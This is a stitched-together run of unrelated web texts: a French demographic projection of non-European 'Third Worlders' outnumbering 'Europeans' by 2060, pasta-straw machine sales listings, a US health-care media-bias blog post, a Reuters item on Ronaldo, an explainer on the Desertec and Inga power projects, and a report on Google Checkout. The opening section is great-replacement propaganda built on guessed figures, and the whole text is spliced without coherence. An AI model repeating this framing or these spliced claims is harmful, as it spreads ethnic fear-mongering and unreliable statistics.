Bearing in mind that the natural rate of growth of the 62 million inhabitants is 0.4 % and that of the 53 million Europeans ( calculated from our three model departments ) is 0.17 % , it follows that the 9.5 million Third Worlders will grow by 1.75 % .
Pince then acknowledges that there are studies indicating that the rate of growth among immigrants will slow down , but he has no evidence that this will be the case .
Especially since the immigrant growth rate in the Parisian region of Seine , Seine - Saint - Denis , and Val de Marne has increased considerably since 75/82 and 99/2006 .
We must also take into account the migratory waves that will occur between 2008 and 2060 .
In the absence of new statistics , we must base our estimates on those of 2006 .
That year France recorded 235,000 official entries , to which must be added about 100,000 illegals , or a rounded - off total of 350,000 persons just from the Third World ( Maghreb , Sub - Saharan Africa , Asia , etc . .. )
We 're using , by default , this annual figure for the entire period even though it is an optimistic guess .
The Left , the large corporations , the EU Commission in Brussels and most of our intellectuals are demanding ever more immigration .
Moreover , due to demographic growth and the insecurity and poverty endemic to Africa , the migratory pressures may well become greater and greater .
We could , therefore , go beyond the 350,000 annual entries in the future .
Next we must calculate on a yearly basis the natural growth of these waves .
We decided upon a rate of 1.75 % , identical to the one we have for the population that is already here .
This rate , higher than the one for Turkey ( 1.3 % ) but much lower than that of the Congo ( 3.1 % ) takes into account the growing proportion of immigrants from sub-Saharan Africa .
Following these calculations , the future immigration between 2008 and 2060 will bring us a total input of 31 million persons .
So in 2060 we will have a France of 108 million inhabitants , composed of 55 million persons ( 24 + 31 ) belonging to black , Arab and Asian ethnicities and 53 million Europeans .
Yes , 2060 may appear far off , but well before this date Europeans under the age of 40 will be a minority in relation to the Third Worlders of the same age group .
These results belie the affirmations of those who claim France is not a country of massive immigration .
In fact , our " thought police " now acknowledge that the face of France is going to be transformed very soon and adhere , in substance , to the following line : " You were deceived for thirty years with bogus statistics .
Now , the situation is irreversible .
In the name of anti-racism and obligatory ' métissage ' , you ought to be happy to have become a minority in your own country ! "
Now imagine that the Algerian government announces that soon Europeans will be in the majority in Algeria !
There would be a general insurrection .
That means that this " post racial " doctrine , which claims to be universal , only applies in reality to the Western populations who are told to dissolve themselves as rapidly as possible .
Alas , the majority of Frenchmen are resigned to this evolution that seems inevitable .
In one of several footnotes Pince explains how the official statistics on the number of illegal entries in 2006 are falsified , and how he arrived at the figure of 100,000 :
To minimize the figures on immigration , the research groups and the media only take into account permanent immigration , since they feel that temporary migrants have no wish to remain on our territory .
In reality , the temporary migrants do remain .
( For example , since 2002 , a circular authorizes students to apply for a salaried position when their studies are over .
As for those requesting asylum , about 15 % of the applications are accepted , which means that the others stay on as illegals ) .
To these official figures are added the illegal waves of migrants .
Besides those denied asylum , France grants 900,000 tourist visas every year to North and sub-Saharan Africans .
The Court of Accounts speaks of certain dysfunctional elements in this system which give rise to the observation that many visitors remain illegally in France after their visa has expired .
Based on this , we can , therefore , estimate at 100,000 the number of illegal entries [ per year ] .
pasta drinking straws extruder
Pasta Straw Machine - Jinan Sunward Machinery Co. , LtdDegradable Drinking Straw Machine Straw Making Machine .
Min. Order : 1 Set. Certification : CE , SA8000 , ISO9001 .
Power Source : Electric .
Process : ExtruderDegradable Pasta Drink Straw Extrusion Machine - BuyDegradable Pasta Drink Straw Extrusion Machine , Find Complete Details about Degradable Pasta Drink Straw Extrusion Machine , Drinking Water Tube , Eco
China Macaroni Pasta Degradable Drinking Straw ProductionChina Macaroni Pasta Degradable Drinking Straw Production Line Extruder Making Machines , Find details about China Drinking Straw Production Line , Drinking Straw Extrusion Machine - Alibaba445 products - Degradable Pasta Drink Straw Extrusion Machine . US $ 18000 - $ 18000 / Set. 1 Set ( Min. Order ) The Amazing Pasta StrawDisposable and biodegradable pasta straws are the perfect replacements for harmful plastic straws and flimsy paper strawspasta macaroni rice straw food extruder - Jinan Tainuopasta macaroni rice straw food extruder , US $ 15000 - 80000 / Set , New , china ,
In fast food and beverage stores , plastic straw is the most commonly used ,
First , I have to dispel the myth that no bloggers check their facts before posting .
That 's wrong , but newspapers , radio and tv reporters need to feel relevant ; so that 's their story and they 're sticking to it .
Many bloggers have advanced degrees and are professionals sharing their knowledge and research and we are lucky enough to have forums where we can share our findings .
Our free press is beholden to their advertisers and their star reporters at best , turn blind eyes to inconvenient truths or at worst , trade favors for access to their sources .
The conflict of interest is apparent to anyone who bothers to objectively observe news outlets and think it through .
It 's obvious from how health care reform is predominately framed and reported that our " free " press is anything but free and unbiased .
For instance :
We have health care reform crawling along at a snail 's pace while Republicans and pundits say Obama is moving too fast .
Reporters report the too fast business , but miss the fact that some of us have been striving for reform for twenty years .
.
Moving ....too ...... fast ?
You have to wonder where the media is coming from ?
Health care reform has been tinkered with and piddled with and turned into a Frankensteinian mess over the last 70 years .
We have the momentum to change it and the media cheerleaders echo the conservative fear mongers that say we 're going about this too fast ?
We have anywhere from 18,000 to 22,000 people dying each year from denied care .
That 's 50 - 60 people per day .
That 's 2 people per hour .
That 's as many as 5 people every 2 hours .
It only takes 30 minutes or so for our health care system to kill someone .
Remember the tainted spinach that killed 3 people ?
E. coli kills about 60 people per year and makes about 73,000 ill .
The media was all over this .
The CDC gives a full report on the e.coli outbreak and the final death toll rose to 4 , 35 with kidney failure and 103 hospitalized .
Controversial new rules were put in play fairly quickly to make the nation 's food supply of bagged greens safer .
There 's been some complaints about the effectiveness of these rules and the cost of them .
Others wonder if they do any good , but that 's not my point .
4 deaths over 2 months made an entire industry spin around and change course .
So back to the U.S. Health Care System that kills 18,000 - 22,000 people per year ( 50 - 60 people a day , 1 person about every 30 minutes ) .... that has continued and increased in numbers over the past 10 or so years .
How many people have to die before we demand change ?
That death rate barely gets a blink from CNN , ABCnews , CBSnews , NBCnews the NYTimes , BostonGlobe , SFGate or WaPo .
That death rate does n't outrage Andrea Mitchell , Charles Gibson , Wolf Blitzer or Joe Scarborough .
Personalities like Glenn Beck , Sean Hannity and Rush Limbaugh simply ignore this death rate , or say the statistic is a lie .
Not only does health care not upset the media or their personalities delivering the news , they help organizations lie about reform efforts .
Pharmaceutical companies spend $ 10.6 billion per year on direct to consumer advertising with a 10:1 ROI .
I have n't found what health insurers spend on their marketing budgets yet , but you can be sure it 's probably more than pharma .
And then there 's AARP , an organization that derives a substantial portion of their revenue from licensing their name to insurance companies that says they are health and wellness advocates for older Americans .
The advertising revenue to the MSM for product promotion is huge .
Then there 's the pharma and insurer backed political organizations whose only purpose is to defeat health care reform .
Pharmaceutical companies are beefing up their influence along with Insurance companies .
That 's $ 1.4 million per day ( plus DTC advertising peddling pharma , insurance and AARP ) is falling into the coffers of the main stream media who does n't disclose their conflict of interest at the beginning of every segment they report health care reform news .
You did n't think they would bite the hand that feeds them , did you ?
Our press is n't free .
They are puppets on a purse string .
RIO DE JANEIRO ( Reuters ) - Brazilian soccer player Ronaldo will take part in a film about a Palestinian girl who hoped to meet him but was killed by a land mine before she could fulfill her dream , his club said Sunday .
“ ( Ronaldo ) confirmed that he made an agreement with the Iranian director to make the film in the Palestinian territories , ” a spokesman for the Brazilian club Corinthians told Reuters .
The three times FIFA World Player of the Year ’s part will be filmed when Corinthians plays a friendly “ Peace match ” against fellow Brazilian team Flamengo at a Palestinian venue on September 15 .
Corinthians have authorized Ronaldo , a World Cup winner with Brazil 2002 , to stay on for a few days after the friendly to film his scenes .
The film is based on the true story of a young girl who was good at soccer and idolized Ronaldo .
She died after losing a leg when she stepped on a land mine in southern Lebanon .
Ronaldo , a United Nations ambassador , visited handicapped children on a day trip to Ramallah on the West Bank and to Tel Aviv in 2005 .
The film , produced by Iranians Mansur Sohrabpour and Mohammad Latif , will be shot in Lebanon .
Bear On The Bird Feeder
So you think you have problems with squirrels on your bird feeder ???
March 21 , 2006
Why are we asking this now ?
Two hugely ambitious power - generating schemes have been launched in recent weeks , one offering to create the world 's largest solar farm and the other to create the biggest hydroelectric dam on the planet .
In both cases the location for the mega - projects is Africa : the solar - power scheme envisages harnessing the sun in the Moroccan and / or Algerian Sahara ; while the hydroelectric plan centres on damming the mighty Congo River .
What the two projects have in common is that they seek to export the majority of the power they intend to generate from impoverished countries to more developed economies .
In the case of the Sahara to Southern Europe and in the case of Congo to South Africa , foreign mining interests inside the Democratic Republic of Congo and again , Europe .
Even in the best - case scenario neither project will be up and running for 15 years .
Download the new Independent Premium app Sharing the full story , not just the headlines
How would it work ?
Planners behind the Desertec scheme point out that the solar energy that falls on the Sahara in six hours would power Europe for one year .
Although the difficulty in harnessing , storing and transferring that electricity means that the eventual aim is to supply 15 per cent of Europe 's power needs .
The Inga Dam project in DRC aims to generate 40,000 MW , meaning twice the capacity of the giant Three Gorges dam in China , which would be more than the output of South Africa 's entire troubled national power industry .
In terms of how it works , however sophisticated power stations become , they all do broadly the same thing as a bicycle dynamo – they either boil water or harness moving water to turn turbines that generate resistance and charge .
In the Sahara it would be done by a new concentrated solar power ( CSP ) technology which is in effect a vast field of mirrors which collect heat , boil water and turn turbines .
The electricity generated would be channelled through direct current cables under the Mediterranean and into Europe .
In the case of the Congo it would involve absorbing the extraordinary power of the Inga Falls to power the turbines .
The same cables would then transfer that electricity as far afield as South Africa , Nigeria , Egypt and southern Europe .
What would the cost be ?
The Desertec plan has been costed at € 400bn , while the Grand Inga Dam would weigh in at $ 80bn , always assuming that the projects are delivered on budget .
The main backers of the Sahara scheme are a dozen finance and industrial firms , mainly from Germany , including household names such as Siemens .
One of the biggest cost factors will be the direct current cables which will cost as much as $ 1bn each , even to cross from the Sahara to Southern Europe and at least 20 of them are needed .
There are a host of risk factors involved in both that stretch from political and regional instability in the Maghreb to prolonged conflict in the DRC .
Add to these Saharan sandstorms and the costs of providing the water necessary to clean solar panels and cool turbines in a desert .
Why are developed economies shopping for power in the third world ?
The simplest answer is that there are no equivalents of the Saharan solar power or the roaring waters of the Inga Falls in southern England , or anywhere else in crowded Europe .
But another aspect is the difficulty that governments and private investors have had in establishing large renewable energy projects in Europe .
Some , such as Portugal , have forged ahead with widespread windfarms but others , such as the UK , have met with organised , local resistance to big projects that would transform the environment .
By contrast , the Sahara offers proximity to Europe , a tiny population and intense sunlight .
How will Europe benefit ?
In Europe the energy question is a strategic one .
Most governments are looking for ways to reduce their reliance on Russian gas which some would argue has given too much power to Moscow .
Many administrations are pursuing the nuclear option but often without being honest about the timescale involved in launching next - generation civilian reactors – at least 20 years from now in most cases .
All of this is happening while the long - term goal is to reduce greenhouse gas emissions by 80 per cent below 1995 levels before 2050 .
In any case , many EU countries are behind on their commitments to switch at least 15 per cent of their energy needs to renewable resources by 2015 .
How will Africa benefit ?
According to the World Bank , The Grand Inga project has the potential to bring electricity to 500 million homes in Africa .
It would solve at a stroke the electricity crisis in South Africa which has seen the continent 's biggest economy plunged into darkness for days at a time .
However , there are two previous Inga dams , which were costly and corrupt failures .
If it worked , it could also deal with the energy needs of DRC 's mining sector in Katanga , power Namibia and fill the shortfall in Nigeria 's generating capacity .
A quick look at satellite images of the Earth at night are sufficient to show that Africa remains in an electrical dark age .
Fewer than 30 per cent of African households have access to electricity and that number plunges to one in 10 in many countries .
So why the controversy ?
A new report by Usaid this week estimated that there are now one billion people living in Africa .
Despite urbanisation , the majority of them live outside cities , or without access to basic services .
Exporting African electricity to Europe 's businesses and consumers strikes some as grotesquely wrong .
Many development agencies favour a patchwork of smaller projects using existing solar technology – photovoltaic – which is cheaper and more suited to a dispersed population .
In contrast , an open energy market would see Africans competing with far richer Europeans for electricity generated from their natural resources .
Considering the scant benefits that have accrued to ordinary people from other natural boons such as oil and minerals , these projects can be seen as a power grab .
Then there is climate change , to which Africa contributes least and suffers the worst consequences .
In Kenya climate change is contributing to a drought that has crippled the hydropower the country relies on .
A similar crisis in Uganda means the country is running on generators .
Rich industrial nations are already committed to setting up global - warming adaptation funds and technology transfer through the UN climate talks .
Critics of the mega - projects believe the billions would be better spent there than in indirect subsidies to Western multinationals under the guise of helping Africa .
Should Europe be allowed to continue its power - generating schemes in Africa ?
Yes ...
* Europe needs renewable energy and Africa needs massive investment , it 's a win-win situation
* The Sahara is empty and barraged with more solar power every morning than Europe needs in a year
* A new grand dam on the Congo River would power up to 500 million African homes
No ...
* These mega - schemes are huge indirect subsidies from rich nations to multinationals seeking mega- profits
* The centralised grand designs do n't meet Africa 's dispersed power needs and are a huge distraction
* Africa is full of Western - funded white elephants , two of them already on the Congo River
d.howden@independent.co.uk
What is more , for every $ 1 a company spends on search advertising , Google will waive the fees on $ 10 worth of purchases .
Factoring in the 2 percent fee , that represents a rebate of at least 20 percent of advertising spending .
Mr. Schmidt said the company was willing to lose money on transaction fees because it felt the package would increase advertising spending .
" The math works because we can have lower prices and higher volume , " he said .
Google 's decision to give free transaction processing to advertisers has the potential to disrupt its carefully cultivated electronic auction for ad placement .
Google has worked hard to ensure that the auction treats all advertisers equally , sometimes to the dismay of big companies that are used to discounts for major purchases .
It has not offered commissions to advertising agencies , as most media companies do .
Online merchants that do not want to use Google Checkout " might be a little peeved , " said Kevin Lee , chief executive of Did-it.com , a search advertising agency .
" They might say if you give that credit to some people for credit card processing , give it to me for something else . "
Mr. Schmidt said Google had not considered this issue .
While Google 's tactics may be seen as aggressive competition , the company is unlikely to run afoul of antitrust laws because it does not have a monopoly in the market .
Image
When customers click on the advertiser 's link , they are given the choice of using traditional payment methods or Google Checkout .
Credit ...
Google
Yahoo , the other main seller of advertising on search results , recently announced an alliance with eBay that among other things will encourage Yahoo advertisers to use PayPal for payment processing .
PayPal will also be promoted as the online wallet for use on Yahoo services .
Both companies declined to give financial details of the deal .
